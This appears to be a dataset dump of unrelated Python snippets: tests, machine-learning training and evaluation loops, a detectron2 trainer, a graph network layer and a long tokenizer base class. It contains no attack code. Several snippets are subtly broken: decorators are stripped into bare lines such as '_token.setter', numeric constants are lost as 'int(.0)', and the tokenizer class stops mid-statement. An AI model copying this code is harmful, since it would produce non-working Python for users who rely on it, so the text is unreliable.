code stringlengths 281 23.7M |
|---|
def test_create_options(db, settings):
Option.objects.all().delete()
xml_file = (((Path(settings.BASE_DIR) / 'xml') / 'elements') / 'options.xml')
root = read_xml_file(xml_file)
version = root.attrib.get('version')
elements = flat_xml_to_elements(root)
elements = convert_elements(elements, version)
elements = order_elements(elements)
elements = elements.values()
import_elements(elements)
assert (len(root) == len(elements) == Option.objects.count() == 9)
assert all(((element['created'] is True) for element in elements))
assert all(((element['updated'] is False) for element in elements)) |
def test(base_model, psnet_model, decoder, regressor_delta, test_dataloader, args):
global use_gpu
global epoch_best_aqa, rho_best, L2_min, RL2_min
global epoch_best_tas, pred_tious_best_5, pred_tious_best_75
true_scores = []
pred_scores = []
pred_tious_test_5 = []
pred_tious_test_75 = []
base_model.eval()
psnet_model.eval()
decoder.eval()
regressor_delta.eval()
batch_num = len(test_dataloader)
with torch.no_grad():
datatime_start = time.time()
for (batch_idx, (data, target)) in enumerate(test_dataloader, 0):
datatime = (time.time() - datatime_start)
start = time.time()
video_1 = data['video'].float().cuda()
video_2_list = [item['video'].float().cuda() for item in target]
label_1_tas = (data['transits'].float().cuda() + 1)
label_2_tas_list = [(item['transits'].float().cuda() + 1) for item in target]
label_2_score_list = [item['final_score'].float().reshape((- 1), 1).cuda() for item in target]
helper.network_forward_test(base_model, psnet_model, decoder, regressor_delta, pred_scores, video_1, video_2_list, label_2_score_list, args, label_1_tas, label_2_tas_list, pred_tious_test_5, pred_tious_test_75)
batch_time = (time.time() - start)
if ((batch_idx % args.print_freq) == 0):
print(('[TEST][%d/%d] \t Batch_time %.2f \t Data_time %.2f' % (batch_idx, batch_num, batch_time, datatime)))
datatime_start = time.time()
true_scores.extend(data['final_score'].numpy())
pred_scores = np.array(pred_scores)
true_scores = np.array(true_scores)
(rho, p) = stats.spearmanr(pred_scores, true_scores)
L2 = (np.power((pred_scores - true_scores), 2).sum() / true_scores.shape[0])
RL2 = (np.power(((pred_scores - true_scores) / (true_scores.max() - true_scores.min())), 2).sum() / true_scores.shape[0])
pred_tious_test_mean_5 = (sum(pred_tious_test_5) / (len(test_dataloader) * args.bs_test))
pred_tious_test_mean_75 = (sum(pred_tious_test_75) / (len(test_dataloader) * args.bs_test))
print(('[TEST] tIoU_5: %.6f, tIoU_75: %.6f' % (pred_tious_test_mean_5, pred_tious_test_mean_75)))
print(('[TEST] correlation: %.6f, L2: %.6f, RL2: %.6f' % (rho, L2, RL2))) |
class Trainer(DefaultTrainer):
def build_evaluator(cls, cfg, dataset_name, output_folder=None):
if (output_folder is None):
output_folder = os.path.join(cfg.OUTPUT_DIR, 'inference')
os.makedirs(output_folder, exist_ok=True)
evaluator_list = []
evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type
if (evaluator_type == 'coco'):
evaluator_list.append(COCOEvaluator(dataset_name, cfg, True, output_folder))
elif (evaluator_type == 'ytvis'):
evaluator_list.append(YTVISEvaluator(dataset_name, cfg, True, output_folder))
if (len(evaluator_list) == 0):
raise NotImplementedError('no Evaluator for the dataset {} with the type {}'.format(dataset_name, evaluator_type))
elif (len(evaluator_list) == 1):
return evaluator_list[0]
return DatasetEvaluators(evaluator_list)
def build_train_loader(cls, cfg):
dataset_name = cfg.DATASETS.TRAIN[0]
if dataset_name.startswith('coco'):
mapper = DetrDatasetMapper(cfg, is_train=True)
elif dataset_name.startswith('ytvis'):
mapper = YTVISDatasetMapper(cfg, is_train=True)
dataset_dict = get_detection_dataset_dicts(dataset_name, filter_empty=cfg.DATALOADER.FILTER_EMPTY_ANNOTATIONS, proposal_files=(cfg.DATASETS.PROPOSAL_FILES_TRAIN if cfg.MODEL.LOAD_PROPOSALS else None))
return build_detection_train_loader(cfg, mapper=mapper, dataset=dataset_dict)
def build_test_loader(cls, cfg, dataset_name):
dataset_name = cfg.DATASETS.TEST[0]
if dataset_name.startswith('coco'):
mapper = DetrDatasetMapper(cfg, is_train=False)
elif dataset_name.startswith('ytvis'):
mapper = YTVISDatasetMapper(cfg, is_train=False)
return build_detection_test_loader(cfg, dataset_name, mapper=mapper)
def build_optimizer(cls, cfg, model):
params: List[Dict[(str, Any)]] = []
memo: Set[torch.nn.parameter.Parameter] = set()
for (key, value) in model.named_parameters(recurse=True):
if (not value.requires_grad):
continue
if (value in memo):
continue
memo.add(value)
lr = cfg.SOLVER.BASE_LR
weight_decay = cfg.SOLVER.WEIGHT_DECAY
if ('backbone' in key):
lr = (lr * cfg.SOLVER.BACKBONE_MULTIPLIER)
params += [{'params': [value], 'lr': lr, 'weight_decay': weight_decay}]
def maybe_add_full_model_gradient_clipping(optim):
clip_norm_val = cfg.SOLVER.CLIP_GRADIENTS.CLIP_VALUE
enable = (cfg.SOLVER.CLIP_GRADIENTS.ENABLED and (cfg.SOLVER.CLIP_GRADIENTS.CLIP_TYPE == 'full_model') and (clip_norm_val > 0.0))
class FullModelGradientClippingOptimizer(optim):
def step(self, closure=None):
all_params = itertools.chain(*[x['params'] for x in self.param_groups])
torch.nn.utils.clip_grad_norm_(all_params, clip_norm_val)
super().step(closure=closure)
return (FullModelGradientClippingOptimizer if enable else optim)
optimizer_type = cfg.SOLVER.OPTIMIZER
if (optimizer_type == 'SGD'):
optimizer = maybe_add_full_model_gradient_clipping(torch.optim.SGD)(params, cfg.SOLVER.BASE_LR, momentum=cfg.SOLVER.MOMENTUM)
elif (optimizer_type == 'ADAMW'):
optimizer = maybe_add_full_model_gradient_clipping(torch.optim.AdamW)(params, cfg.SOLVER.BASE_LR)
else:
raise NotImplementedError(f'no optimizer type {optimizer_type}')
if (not (cfg.SOLVER.CLIP_GRADIENTS.CLIP_TYPE == 'full_model')):
optimizer = maybe_add_gradient_clipping(cfg, optimizer)
return optimizer |
class PetConfig(ABC):
def __repr__(self):
return repr(self.__dict__)
def save(self, path: str):
with open(path, 'w', encoding='utf8') as fh:
json.dump(self.__dict__, fh)
def load(cls, path: str):
cfg = cls.__new__(cls)
with open(path, 'r', encoding='utf8') as fh:
cfg.__dict__ = json.load(fh)
return cfg |
def test_get_style_defs_contains_default_line_numbers_styles():
style_defs = HtmlFormatter().get_style_defs().splitlines()
assert (style_defs[1] == 'td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }')
assert (style_defs[2] == 'span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }') |
def _resolve_ship(fitting, sMkt, b_localized):
shipType = fitting.getElementsByTagName('shipType').item(0).getAttribute('value')
anything = None
if b_localized:
try:
(shipType, anything) = _extract_match(shipType)
except ExtractingError:
pass
limit = 2
ship = None
while True:
must_retry = False
try:
try:
ship = Ship(sMkt.getItem(shipType))
except ValueError:
ship = Citadel(sMkt.getItem(shipType))
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
pyfalog.warning('Caught exception on _resolve_ship')
pyfalog.error(e)
limit -= 1
if (limit == 0):
break
shipType = anything
must_retry = True
if (not must_retry):
break
if (ship is None):
raise Exception('cannot resolve ship type.')
fitobj = Fit(ship=ship)
anything = fitting.getAttribute('name')
if (('<' in anything) or ('>' in anything)):
anything = replace_ltgt(anything)
fitobj.name = anything
return fitobj |
class Graphsn_GIN(nn.Module):
def __init__(self, nfeat, nhid, nclass, dropout):
super(Graphsn_GIN, self).__init__()
self.nn = Linear(nfeat, nhid)
self.fc = Linear(nhid, nclass)
self.dropout = dropout
self.eps = nn.Parameter(torch.FloatTensor(1))
self.reset_parameters()
def reset_parameters(self):
stdv_eps = (0.6 / math.sqrt(self.eps.size(0)))
nn.init.constant_(self.eps, stdv_eps)
def forward(self, x, adj):
v = (self.eps * torch.diag(adj))
mask = torch.diag(torch.ones_like(v))
adj = ((mask * torch.diag(v)) + ((1.0 - mask) * adj))
x = torch.mm(adj, x)
x = F.relu(self.nn(x))
x = F.dropout(x, self.dropout, training=self.training)
x = self.fc(x)
return F.log_softmax(x, dim=(- 1)) |
def train_sample_places_low_shot(low_shot_trainer: SVMLowShotTrainer, k_values: List[int], sample_inds: List[int], sample_num: int, output_dir: str, layername: str, cfg: AttrDict):
set_env_vars(local_rank=0, node_id=0, cfg=cfg)
for low_shot_kvalue in k_values:
checkpoint_dir = f'{output_dir}/sample{sample_num}_k{low_shot_kvalue}'
train_data = merge_features(checkpoint_dir, 'train', layername, cfg)
train_features = train_data['features']
train_targets = train_data['targets']
checkpoint_dir = f'{output_dir}/sample{sample_inds[0]}_k{k_values[0]}'
test_data = merge_features(checkpoint_dir, 'test', layername, cfg)
test_features = test_data['features']
test_targets = test_data['targets']
low_shot_trainer.train(train_features, train_targets, sample_num, low_shot_kvalue)
low_shot_trainer.test(test_features, test_targets, sample_num, low_shot_kvalue) |
def test_verify_args(parser: CompatibleArgumentParser, capsys: CaptureFixture) -> None:
with pytest.raises(SystemExit) as ex:
parser.parse_args(['--no-license-path'])
capture = capsys.readouterr().err
for arg in ('--no-license-path', '--with-license-file'):
assert (arg in capture)
with pytest.raises(SystemExit) as ex:
parser.parse_args(['--with-notice-file'])
capture = capsys.readouterr().err
for arg in ('--with-notice-file', '--with-license-file'):
assert (arg in capture)
with pytest.raises(SystemExit) as ex:
parser.parse_args(['--filter-code-page=utf8'])
capture = capsys.readouterr().err
for arg in ('--filter-code-page', '--filter-strings'):
assert (arg in capture)
with pytest.raises(SystemExit) as ex:
parser.parse_args(['--filter-strings', '--filter-code-page=XX'])
capture = capsys.readouterr().err
for arg in ('invalid code', '--filter-code-page'):
assert (arg in capture) |
class MultiRcTaskHelper(TaskHelper):
def add_special_input_features(self, input_example: InputExample, input_features: InputFeatures) -> None:
input_features.meta['question_idx'] = input_example.meta['question_idx']
def add_features_to_dict(self, features: List[InputFeatures], feature_dict: Dict[(str, torch.Tensor)]) -> None:
feature_dict['question_idx'] = torch.tensor([f.meta['question_idx'] for f in features], dtype=torch.long) |
def pass_calibration_data(sim_model, forward_pass_args=None):
data_loader = ImageNetDataPipeline.get_val_dataloader()
batch_size = 64
max_batch_counter = 16
sim_model.eval()
current_batch_counter = 0
with torch.no_grad():
for (input_data, target_data) in data_loader:
inputs_batch = input_data
sim_model(inputs_batch)
current_batch_counter += 1
if (current_batch_counter == max_batch_counter):
break |
class PreTrainedTokenizer(object):
vocab_files_names = {}
pretrained_vocab_files_map = {}
pretrained_init_configuration = {}
max_model_input_sizes = {}
SPECIAL_TOKENS_ATTRIBUTES = ['bos_token', 'eos_token', 'unk_token', 'sep_token', 'pad_token', 'cls_token', 'mask_token', 'additional_special_tokens']
padding_side = 'right'
def bos_token(self):
if (self._bos_token is None):
logger.error('Using bos_token, but it is not set yet.')
return self._bos_token
def eos_token(self):
if (self._eos_token is None):
logger.error('Using eos_token, but it is not set yet.')
return self._eos_token
def unk_token(self):
if (self._unk_token is None):
logger.error('Using unk_token, but it is not set yet.')
return self._unk_token
def sep_token(self):
if (self._sep_token is None):
logger.error('Using sep_token, but it is not set yet.')
return self._sep_token
def pad_token(self):
if (self._pad_token is None):
logger.error('Using pad_token, but it is not set yet.')
return self._pad_token
def cls_token(self):
if (self._cls_token is None):
logger.error('Using cls_token, but it is not set yet.')
return self._cls_token
def mask_token(self):
if (self._mask_token is None):
logger.error('Using mask_token, but it is not set yet.')
return self._mask_token
def additional_special_tokens(self):
if (self._additional_special_tokens is None):
logger.error('Using additional_special_tokens, but it is not set yet.')
return self._additional_special_tokens
_token.setter
def bos_token(self, value):
self._bos_token = value
_token.setter
def eos_token(self, value):
self._eos_token = value
_token.setter
def unk_token(self, value):
self._unk_token = value
_token.setter
def sep_token(self, value):
self._sep_token = value
_token.setter
def pad_token(self, value):
self._pad_token = value
_token.setter
def cls_token(self, value):
self._cls_token = value
_token.setter
def mask_token(self, value):
self._mask_token = value
_special_tokens.setter
def additional_special_tokens(self, value):
self._additional_special_tokens = value
def bos_token_id(self):
return self.convert_tokens_to_ids(self.bos_token)
def eos_token_id(self):
return self.convert_tokens_to_ids(self.eos_token)
def unk_token_id(self):
return self.convert_tokens_to_ids(self.unk_token)
def sep_token_id(self):
return self.convert_tokens_to_ids(self.sep_token)
def pad_token_id(self):
return self.convert_tokens_to_ids(self.pad_token)
def pad_token_type_id(self):
return self._pad_token_type_id
def cls_token_id(self):
return self.convert_tokens_to_ids(self.cls_token)
def mask_token_id(self):
return self.convert_tokens_to_ids(self.mask_token)
def additional_special_tokens_ids(self):
return self.convert_tokens_to_ids(self.additional_special_tokens)
def __init__(self, max_len=None, **kwargs):
self._bos_token = None
self._eos_token = None
self._unk_token = None
self._sep_token = None
self._pad_token = None
self._cls_token = None
self._mask_token = None
self._pad_token_type_id = 0
self._additional_special_tokens = []
self.max_len = (max_len if (max_len is not None) else int(.0))
self.padding_side = kwargs.pop('padding_side', self.padding_side)
self.added_tokens_encoder = {}
self.unique_added_tokens_encoder = set()
self.added_tokens_decoder = {}
self.init_inputs = ()
self.init_kwargs = {}
for (key, value) in kwargs.items():
if (key in self.SPECIAL_TOKENS_ATTRIBUTES):
if (key == 'additional_special_tokens'):
assert (isinstance(value, (list, tuple)) and all((isinstance(t, str) for t in value)))
else:
assert isinstance(value, str)
setattr(self, key, value)
def from_pretrained(cls, *inputs, **kwargs):
return cls._from_pretrained(*inputs, **kwargs)
def _from_pretrained(cls, pretrained_model_name_or_path, *init_inputs, **kwargs):
cache_dir = kwargs.pop('cache_dir', None)
force_download = kwargs.pop('force_download', False)
resume_download = kwargs.pop('resume_download', False)
proxies = kwargs.pop('proxies', None)
s3_models = list(cls.max_model_input_sizes.keys())
vocab_files = {}
init_configuration = {}
if (pretrained_model_name_or_path in s3_models):
for (file_id, map_list) in cls.pretrained_vocab_files_map.items():
vocab_files[file_id] = map_list[pretrained_model_name_or_path]
if (cls.pretrained_init_configuration and (pretrained_model_name_or_path in cls.pretrained_init_configuration)):
init_configuration = cls.pretrained_init_configuration[pretrained_model_name_or_path]
else:
logger.info("Model name '{}' not found in model shortcut name list ({}). Assuming '{}' is a path or url to a directory containing tokenizer files.".format(pretrained_model_name_or_path, ', '.join(s3_models), pretrained_model_name_or_path))
for (file_id, file_name) in cls.vocab_files_names.items():
if os.path.isdir(pretrained_model_name_or_path):
full_file_name = os.path.join(pretrained_model_name_or_path, file_name)
if (not os.path.exists(full_file_name)):
logger.info("Didn't find file {}. We won't load it.".format(full_file_name))
full_file_name = None
elif (os.path.isfile(pretrained_model_name_or_path) or is_remote_url(pretrained_model_name_or_path)):
full_file_name = pretrained_model_name_or_path
else:
full_file_name = hf_bucket_url(pretrained_model_name_or_path, postfix=file_name)
vocab_files[file_id] = full_file_name
additional_files_names = {'added_tokens_file': ADDED_TOKENS_FILE, 'special_tokens_map_file': SPECIAL_TOKENS_MAP_FILE, 'tokenizer_config_file': TOKENIZER_CONFIG_FILE}
saved_directory = pretrained_model_name_or_path
if (os.path.exists(saved_directory) and (not os.path.isdir(saved_directory))):
saved_directory = os.path.dirname(saved_directory)
for (file_id, file_name) in additional_files_names.items():
full_file_name = os.path.join(saved_directory, file_name)
if (not os.path.exists(full_file_name)):
logger.info("Didn't find file {}. We won't load it.".format(full_file_name))
full_file_name = None
vocab_files[file_id] = full_file_name
if all(((full_file_name is None) for full_file_name in vocab_files.values())):
raise EnvironmentError("Model name '{}' was not found in tokenizers model name list ({}). We assumed '{}' was a path or url to a directory containing vocabulary files named {} but couldn't find such vocabulary files at this path or url.".format(pretrained_model_name_or_path, ', '.join(s3_models), pretrained_model_name_or_path, list(cls.vocab_files_names.values())))
try:
resolved_vocab_files = {}
for (file_id, file_path) in vocab_files.items():
if (file_path is None):
resolved_vocab_files[file_id] = None
else:
resolved_vocab_files[file_id] = cached_path(file_path, cache_dir=cache_dir, force_download=force_download, proxies=proxies, resume_download=resume_download)
except EnvironmentError:
if (pretrained_model_name_or_path in s3_models):
msg = "Couldn't reach server at '{}' to download vocabulary files."
else:
msg = "Model name '{}' was not found in tokenizers model name list ({}). We assumed '{}' was a path or url to a directory containing vocabulary files named {}, but couldn't find such vocabulary files at this path or url.".format(pretrained_model_name_or_path, ', '.join(s3_models), pretrained_model_name_or_path, list(cls.vocab_files_names.values()))
raise EnvironmentError(msg)
for (file_id, file_path) in vocab_files.items():
if (file_path == resolved_vocab_files[file_id]):
logger.info('loading file {}'.format(file_path))
else:
logger.info('loading file {} from cache at {}'.format(file_path, resolved_vocab_files[file_id]))
tokenizer_config_file = resolved_vocab_files.pop('tokenizer_config_file', None)
if (tokenizer_config_file is not None):
with open(tokenizer_config_file, encoding='utf-8') as tokenizer_config_handle:
init_kwargs = json.load(tokenizer_config_handle)
saved_init_inputs = init_kwargs.pop('init_inputs', ())
if (not init_inputs):
init_inputs = saved_init_inputs
else:
init_kwargs = init_configuration
init_kwargs.update(kwargs)
if (pretrained_model_name_or_path in cls.max_model_input_sizes):
max_len = cls.max_model_input_sizes[pretrained_model_name_or_path]
if ((max_len is not None) and isinstance(max_len, (int, float))):
init_kwargs['max_len'] = min(init_kwargs.get('max_len', int(.0)), max_len)
added_tokens_file = resolved_vocab_files.pop('added_tokens_file', None)
special_tokens_map_file = resolved_vocab_files.pop('special_tokens_map_file', None)
for (args_name, file_path) in resolved_vocab_files.items():
if (args_name not in init_kwargs):
init_kwargs[args_name] = file_path
if (special_tokens_map_file is not None):
with open(special_tokens_map_file, encoding='utf-8') as special_tokens_map_handle:
special_tokens_map = json.load(special_tokens_map_handle)
for (key, value) in special_tokens_map.items():
if (key not in init_kwargs):
init_kwargs[key] = value
try:
tokenizer = cls(*init_inputs, **init_kwargs)
except OSError:
OSError('Unable to load vocabulary from file. Please check that the provided vocabulary is accessible and not corrupted.')
tokenizer.init_inputs = init_inputs
tokenizer.init_kwargs = init_kwargs
if (added_tokens_file is not None):
with open(added_tokens_file, encoding='utf-8') as added_tokens_handle:
added_tok_encoder = json.load(added_tokens_handle)
added_tok_decoder = {v: k for (k, v) in added_tok_encoder.items()}
tokenizer.added_tokens_encoder.update(added_tok_encoder)
tokenizer.added_tokens_decoder.update(added_tok_decoder)
return tokenizer
def save_pretrained(self, save_directory):
if (not os.path.isdir(save_directory)):
logger.error('Saving directory ({}) should be a directory'.format(save_directory))
return
special_tokens_map_file = os.path.join(save_directory, SPECIAL_TOKENS_MAP_FILE)
added_tokens_file = os.path.join(save_directory, ADDED_TOKENS_FILE)
tokenizer_config_file = os.path.join(save_directory, TOKENIZER_CONFIG_FILE)
tokenizer_config = copy.deepcopy(self.init_kwargs)
tokenizer_config['init_inputs'] = copy.deepcopy(self.init_inputs)
for file_id in self.vocab_files_names.keys():
tokenizer_config.pop(file_id, None)
with open(tokenizer_config_file, 'w', encoding='utf-8') as f:
f.write(json.dumps(tokenizer_config, ensure_ascii=False))
with open(special_tokens_map_file, 'w', encoding='utf-8') as f:
f.write(json.dumps(self.special_tokens_map, ensure_ascii=False))
with open(added_tokens_file, 'w', encoding='utf-8') as f:
if self.added_tokens_encoder:
out_str = json.dumps(self.added_tokens_encoder, ensure_ascii=False)
else:
out_str = '{}'
f.write(out_str)
vocab_files = self.save_vocabulary(save_directory)
return (vocab_files + (special_tokens_map_file, added_tokens_file))
def save_vocabulary(self, save_directory):
raise NotImplementedError
def vocab_size(self):
raise NotImplementedError
def __len__(self):
return (self.vocab_size + len(self.added_tokens_encoder))
def add_tokens(self, new_tokens):
if (not new_tokens):
return 0
to_add_tokens = []
for token in new_tokens:
assert isinstance(token, str)
if (self.init_kwargs.get('do_lower_case', False) and (token not in self.all_special_tokens)):
token = token.lower()
if ((token != self.unk_token) and (self.convert_tokens_to_ids(token) == self.convert_tokens_to_ids(self.unk_token)) and (token not in to_add_tokens)):
to_add_tokens.append(token)
logger.info('Adding %s to the vocabulary', token)
added_tok_encoder = dict(((tok, (len(self) + i)) for (i, tok) in enumerate(to_add_tokens)))
added_tok_decoder = {v: k for (k, v) in added_tok_encoder.items()}
self.added_tokens_encoder.update(added_tok_encoder)
self.unique_added_tokens_encoder = set(self.added_tokens_encoder.keys()).union(set(self.all_special_tokens))
self.added_tokens_decoder.update(added_tok_decoder)
return len(to_add_tokens)
def num_added_tokens(self, pair=False):
token_ids_0 = []
token_ids_1 = []
return len(self.build_inputs_with_special_tokens(token_ids_0, (token_ids_1 if pair else None)))
def add_special_tokens(self, special_tokens_dict):
if (not special_tokens_dict):
return 0
added_tokens = 0
for (key, value) in special_tokens_dict.items():
assert (key in self.SPECIAL_TOKENS_ATTRIBUTES)
if (key == 'additional_special_tokens'):
assert (isinstance(value, (list, tuple)) and all((isinstance(t, str) for t in value)))
added_tokens += self.add_tokens(value)
else:
assert isinstance(value, str)
added_tokens += self.add_tokens([value])
logger.info('Assigning %s to the %s key of the tokenizer', value, key)
setattr(self, key, value)
return added_tokens
def tokenize(self, text, **kwargs):
all_special_tokens = self.all_special_tokens
def lowercase_text(t):
escaped_special_toks = [re.escape(s_tok) for s_tok in all_special_tokens]
pattern = ((('(' + '|'.join(escaped_special_toks)) + ')|') + '(.+?)')
return re.sub(pattern, (lambda m: (m.groups()[0] or m.groups()[1].lower())), t)
if self.init_kwargs.get('do_lower_case', False):
text = lowercase_text(text)
def split_on_token(tok, text):
result = []
split_text = text.split(tok)
for (i, sub_text) in enumerate(split_text):
sub_text = sub_text.strip()
if ((i == 0) and (not sub_text)):
result += [tok]
elif (i == (len(split_text) - 1)):
if sub_text:
result += [sub_text]
else:
pass
else:
if sub_text:
result += [sub_text]
result += [tok]
return result
def split_on_tokens(tok_list, text):
if (not text.strip()):
return []
if (not tok_list):
return self._tokenize(text, **kwargs)
tokenized_text = []
text_list = [text]
for tok in tok_list:
tokenized_text = []
for sub_text in text_list:
if (sub_text not in self.unique_added_tokens_encoder):
tokenized_text += split_on_token(tok, sub_text)
else:
tokenized_text += [sub_text]
text_list = tokenized_text
return list(itertools.chain.from_iterable(((self._tokenize(token, **kwargs) if (token not in self.unique_added_tokens_encoder) else [token]) for token in tokenized_text)))
added_tokens = self.unique_added_tokens_encoder
tokenized_text = split_on_tokens(added_tokens, text)
return tokenized_text
def _tokenize(self, text, **kwargs):
raise NotImplementedError
def convert_tokens_to_ids(self, tokens):
if (tokens is None):
return None
if isinstance(tokens, str):
return self._convert_token_to_id_with_added_voc(tokens)
ids = []
for token in tokens:
ids.append(self._convert_token_to_id_with_added_voc(token))
return ids
def _convert_token_to_id_with_added_voc(self, token):
if (token is None):
return None
if (token in self.added_tokens_encoder):
return self.added_tokens_encoder[token]
return self._convert_token_to_id(token)
def _convert_token_to_id(self, token):
raise NotImplementedError
def encode(self, text, text_pair=None, add_special_tokens=True, max_length=None, stride=0, truncation_strategy='longest_first', pad_to_max_length=False, return_tensors=None, **kwargs):
encoded_inputs = self.encode_plus(text, text_pair=text_pair, max_length=max_length, add_special_tokens=add_special_tokens, stride=stride, truncation_strategy=truncation_strategy, pad_to_max_length=pad_to_max_length, return_tensors=return_tensors, **kwargs)
return encoded_inputs['input_ids']
def encode_plus(self, text, text_pair=None, add_special_tokens=True, max_length=None, stride=0, truncation_strategy='longest_first', pad_to_max_length=False, return_tensors=None, return_token_type_ids=True, return_attention_mask=True, return_overflowing_tokens=False, return_special_tokens_mask=False, **kwargs):
def get_input_ids(text):
if isinstance(text, str):
return self.convert_tokens_to_ids(self.tokenize(text, **kwargs))
elif (isinstance(text, (list, tuple)) and (len(text) > 0) and isinstance(text[0], str)):
return self.convert_tokens_to_ids(text)
elif (isinstance(text, (list, tuple)) and (len(text) > 0) and isinstance(text[0], int)):
return text
else:
raise ValueError('Input is not valid. Should be a string, a list/tuple of strings or a list/tuple of integers.')
first_ids = get_input_ids(text)
second_ids = (get_input_ids(text_pair) if (text_pair is not None) else None)
return self.prepare_for_model(first_ids, pair_ids=second_ids, max_length=max_length, pad_to_max_length=pad_to_max_length, add_special_tokens=add_special_tokens, stride=stride, truncation_strategy=truncation_strategy, return_tensors=return_tensors, return_attention_mask=return_attention_mask, return_token_type_ids=return_token_type_ids, return_overflowing_tokens=return_overflowing_tokens, return_special_tokens_mask=return_special_tokens_mask)
def batch_encode_plus(self, batch_text_or_text_pairs=None, add_special_tokens=False, max_length=None, stride=0, truncation_strategy='longest_first', return_tensors=None, return_input_lengths=False, return_attention_masks=False, **kwargs):
batch_outputs = {}
for ids_or_pair_ids in batch_text_or_text_pairs:
if isinstance(ids_or_pair_ids, (list, tuple)):
assert (len(ids_or_pair_ids) == 2)
(ids, pair_ids) = ids_or_pair_ids
else:
(ids, pair_ids) = (ids_or_pair_ids, None)
outputs = self.encode_plus(ids, pair_ids, add_special_tokens=add_special_tokens, max_length=max_length, stride=stride, truncation_strategy=truncation_strategy, return_tensors=None)
if return_input_lengths:
outputs['input_len'] = len(outputs['input_ids'])
for (key, value) in outputs.items():
if (key not in batch_outputs):
batch_outputs[key] = []
batch_outputs[key].append(value)
max_seq_len = max(map(len, batch_outputs['input_ids']))
if return_attention_masks:
batch_outputs['attention_mask'] = [([0] * len(v)) for v in batch_outputs['input_ids']]
if (return_tensors is not None):
for (key, value) in batch_outputs.items():
padded_value = value
if (key != 'input_len'):
padded_value = [(v + ([(self.pad_token_id if (key == 'input_ids') else 1)] * (max_seq_len - len(v)))) for v in padded_value]
if ((return_tensors == 'tf') and is_tf_available()):
batch_outputs[key] = tf.constant(padded_value)
elif ((return_tensors == 'pt') and is_torch_available()):
batch_outputs[key] = torch.tensor(padded_value)
elif (return_tensors is not None):
logger.warning('Unable to convert output to tensors format {}, PyTorch or TensorFlow is not available.'.format(return_tensors))
if return_attention_masks:
if is_tf_available():
batch_outputs['attention_mask'] = tf.abs((batch_outputs['attention_mask'] - 1))
else:
batch_outputs['attention_mask'] = torch.abs((batch_outputs['attention_mask'] - 1))
return batch_outputs
def prepare_for_model(self, ids, pair_ids=None, max_length=None, add_special_tokens=True, stride=0, truncation_strategy='longest_first', pad_to_max_length=False, return_tensors=None, return_token_type_ids=True, return_attention_mask=True, return_overflowing_tokens=False, return_special_tokens_mask=False):
pair = bool((pair_ids is not None))
len_ids = len(ids)
len_pair_ids = (len(pair_ids) if pair else 0)
encoded_inputs = {}
total_len = ((len_ids + len_pair_ids) + (self.num_added_tokens(pair=pair) if add_special_tokens else 0))
if (max_length and (total_len > max_length)):
(ids, pair_ids, overflowing_tokens) = self.truncate_sequences(ids, pair_ids=pair_ids, num_tokens_to_remove=(total_len - max_length), truncation_strategy=truncation_strategy, stride=stride)
if return_overflowing_tokens:
encoded_inputs['overflowing_tokens'] = overflowing_tokens
encoded_inputs['num_truncated_tokens'] = (total_len - max_length)
if add_special_tokens:
sequence = self.build_inputs_with_special_tokens(ids, pair_ids)
token_type_ids = self.create_token_type_ids_from_sequences(ids, pair_ids)
else:
sequence = ((ids + pair_ids) if pair else ids)
token_type_ids = (([0] * len(ids)) + (([1] * len(pair_ids)) if pair else []))
if return_special_tokens_mask:
encoded_inputs['special_tokens_mask'] = self.get_special_tokens_mask(ids, pair_ids)
encoded_inputs['input_ids'] = sequence
if return_token_type_ids:
encoded_inputs['token_type_ids'] = token_type_ids
if (max_length and (len(encoded_inputs['input_ids']) > max_length)):
encoded_inputs['input_ids'] = encoded_inputs['input_ids'][:max_length]
if return_token_type_ids:
encoded_inputs['token_type_ids'] = encoded_inputs['token_type_ids'][:max_length]
if return_special_tokens_mask:
encoded_inputs['special_tokens_mask'] = encoded_inputs['special_tokens_mask'][:max_length]
if ((max_length is None) and (len(encoded_inputs['input_ids']) > self.max_len)):
logger.warning('Token indices sequence length is longer than the specified maximum sequence length for this model ({} > {}). Running this sequence through the model will result in indexing errors'.format(len(ids), self.max_len))
needs_to_be_padded = (pad_to_max_length and ((max_length and (len(encoded_inputs['input_ids']) < max_length)) or ((max_length is None) and (len(encoded_inputs['input_ids']) < self.max_len) and (self.max_len <= 10000))))
if (pad_to_max_length and (max_length is None) and (self.max_len > 10000)):
logger.warning("Sequence can't be padded as no maximum length is specified and the model maximum length is too high.")
if needs_to_be_padded:
difference = ((max_length if (max_length is not None) else self.max_len) - len(encoded_inputs['input_ids']))
if (self.padding_side == 'right'):
if return_attention_mask:
encoded_inputs['attention_mask'] = (([1] * len(encoded_inputs['input_ids'])) + ([0] * difference))
if return_token_type_ids:
encoded_inputs['token_type_ids'] = (encoded_inputs['token_type_ids'] + ([self.pad_token_type_id] * difference))
if return_special_tokens_mask:
encoded_inputs['special_tokens_mask'] = (encoded_inputs['special_tokens_mask'] + ([1] * difference))
encoded_inputs['input_ids'] = (encoded_inputs['input_ids'] + ([self.pad_token_id] * difference))
elif (self.padding_side == 'left'):
if return_attention_mask:
encoded_inputs['attention_mask'] = (([0] * difference) + ([1] * len(encoded_inputs['input_ids'])))
if return_token_type_ids:
encoded_inputs['token_type_ids'] = (([self.pad_token_type_id] * difference) + encoded_inputs['token_type_ids'])
if return_special_tokens_mask:
encoded_inputs['special_tokens_mask'] = (([1] * difference) + encoded_inputs['special_tokens_mask'])
encoded_inputs['input_ids'] = (([self.pad_token_id] * difference) + encoded_inputs['input_ids'])
else:
raise ValueError(('Invalid padding strategy:' + str(self.padding_side)))
elif return_attention_mask:
encoded_inputs['attention_mask'] = ([1] * len(encoded_inputs['input_ids']))
if ((return_tensors == 'tf') and is_tf_available()):
encoded_inputs['input_ids'] = tf.constant([encoded_inputs['input_ids']])
encoded_inputs['token_type_ids'] = tf.constant([encoded_inputs['token_type_ids']])
if ('attention_mask' in encoded_inputs):
encoded_inputs['attention_mask'] = tf.constant([encoded_inputs['attention_mask']])
elif ((return_tensors == 'pt') and is_torch_available()):
encoded_inputs['input_ids'] = torch.tensor([encoded_inputs['input_ids']])
encoded_inputs['token_type_ids'] = torch.tensor([encoded_inputs['token_type_ids']])
if ('attention_mask' in encoded_inputs):
encoded_inputs['attention_mask'] = torch.tensor([encoded_inputs['attention_mask']])
elif (return_tensors is not None):
